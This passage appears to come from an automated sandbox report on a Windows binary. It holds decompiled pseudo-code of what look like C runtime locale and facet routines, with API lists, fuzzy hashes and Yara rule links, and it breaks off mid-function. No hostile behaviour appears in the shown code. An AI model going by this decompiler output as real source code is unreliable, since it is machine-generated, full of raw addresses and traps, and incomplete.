																													return E6DDF0075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6DDE12B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t770 - 0x20);
																															E6DDF3D74(_t770 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t544, _t725, _t743, 0x14);
																															E6DDD6653(_t770 - 0x14, 0);
																															_t744 =  *0x6de96dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6DDB161C(0x6de96d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6DDD66BA(_t770 - 0x14);
																																return E6DDF0075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6DDE1339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t770 - 0x20);
																																		E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t544, _t726, _t744, 0x14);
																																		E6DDD6653(_t770 - 0x14, 0);
																																		_t745 =  *0x6de96db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6DDB161C(0x6de96d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6DDD66BA(_t770 - 0x14);
																																			return E6DDF0075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6DDE13A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t770 - 0x20);
																																					E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t544, _t727, _t745, 0x14);
																																					E6DDD6653(_t770 - 0x14, 0);
																																					_t746 =  *0x6de96ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6DDB161C(0x6de96d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6DDD66BA(_t770 - 0x14);
																																						return E6DDF0075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6DDE1409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t770 - 0x20);
																																								E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t544, _t728, _t746, 0x14);
																																								E6DDD6653(_t770 - 0x14, 0);
																																								_t747 =  *0x6de96de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6DDB161C(0x6de96d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6DDD66BA(_t770 - 0x14);
																																									return E6DDF0075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6DDE1471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t770 - 0x20);
																																											E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t544, _t729, _t747, 0x14);
																																											E6DDD6653(_t770 - 0x14, 0);
																																											_t748 =  *0x6de96dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6DDB161C(0x6de96da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6DDD66BA(_t770 - 0x14);
																																												return E6DDF0075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6DDE14EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t770 - 0x20);
																																														E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t544, _t730, _t748, 0x14);
																																														E6DDD6653(_t770 - 0x14, 0);
																																														_t749 =  *0x6de96dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6DDB161C(0x6de96d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6DDD66BA(_t770 - 0x14);
																																															return E6DDF0075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6DDE1558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t770 - 0x20);
																																																	E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t544, _t731, _t749, 0x14);
																																																	E6DDD6653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6de96e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6DDB161C(0x6de96dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t770 - 0x14);
																																																		return E6DDF0075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6DDE15C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t770 - 0x20);
																																																				E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t544, _t732, _t750, 0x14);
																																																				E6DDD6653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6de96dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6DDB161C(0x6de96d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t770 - 0x14);
																																																					return E6DDF0075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6DDE162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6DDB1438(_t663);
																																																							E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de3851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6de3c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6DDE542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6DDF0075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t733);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6de96dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t732);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6de96e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t731);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6de96dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t730);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6de96dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t729);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6de96de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t728);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6de96ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t727);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6de96db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t726);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6de96dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6DDD6FD3(__eflags, _t725);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6de96dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6DDD6FD3(__eflags, _t724);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6de96dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6DDD6FD3(__eflags, _t723);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6de96df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6DDD6FD3(__eflags, _t722);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6de96df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6DDD6FD3(__eflags, _t721);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6de96dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6DDD6FD3(__eflags, _t720);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6de96df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6DDD6FD3(__eflags, _t719);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6de96dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6DDD6FD3(__eflags, _t718);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6de96dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6DDD6FD3(__eflags, _t717);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6de96db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF230
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF23A
int.LIBCPMT ref: 6DDDF251

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDDF274
std::_Facet_Register.LIBCPMT ref: 6DDDF28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF2C9

Strings

lmm, xrefs: 6DDDF245

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lmm
API String ID: 438560357-2367748141
Opcode ID: 1dfe9b87ffb5a5b8a4bf4b779d33d01ce6d002aa0f904aed305533dacfa92c6a
Instruction ID: 58f20b1c89b14730b489fc61ca31d58e4a320212ec0119508bb2695bfa7fb71c
Opcode Fuzzy Hash: 1dfe9b87ffb5a5b8a4bf4b779d33d01ce6d002aa0f904aed305533dacfa92c6a
Instruction Fuzzy Hash: B111C276808119DBCF01FBA4C840AFDB774AF84718F264109F621AB294DF749A05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DE1E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6de9506c; // 0xc4837075
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6DE1D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6DE1DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6DE1F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6DE191A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6DE12188();
									asm("int3");
									_t171 =  *0x6de976f0; // 0x3424800
									 *0x6de95108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6de951c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6de951ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6DE1DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6DE26102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6de40ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6DDF1C3C( &_v528,  *0x6de951e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6de40de8; // 0x6ddd815c
									 *0x6de3a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6de952b0;
										if(_t233 != 0x6de952b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6DE1CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6DE1CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6DDEF8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,96574AD2), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

_memcmp.LIBVCRUNTIME ref: 6DE1EC2E
_free.LIBCMT ref: 6DE1EC9F
_free.LIBCMT ref: 6DE1ECB8
_free.LIBCMT ref: 6DE1ECEA
_free.LIBCMT ref: 6DE1ECF3
_free.LIBCMT ref: 6DE1ECFF

Strings

C, xrefs: 6DE1EAEC

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 1d2026a1c52f12b779328fdef455ca16bdba5b689d3315f38e7e5710740fb69e
Instruction ID: 769884c0d9fd666be619ceee04bcc338422615160f43162fe9bd706723e733ea
Opcode Fuzzy Hash: 1d2026a1c52f12b779328fdef455ca16bdba5b689d3315f38e7e5710740fb69e
Instruction Fuzzy Hash: 6FC11D75A0961A9FDB24CF18CC84AADB7B4FF49708F2085AAE549E7750DB31AD90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6DE28951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DE28951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6DE2822B();
				_t1 =  &_v8; // 0x6de42130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6DE28289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6de9506c; // 0xc4837075
					_v56 = _t38 ^ _t106;
					 *0x6de95384 =  *0x6de95384 | 0xffffffff;
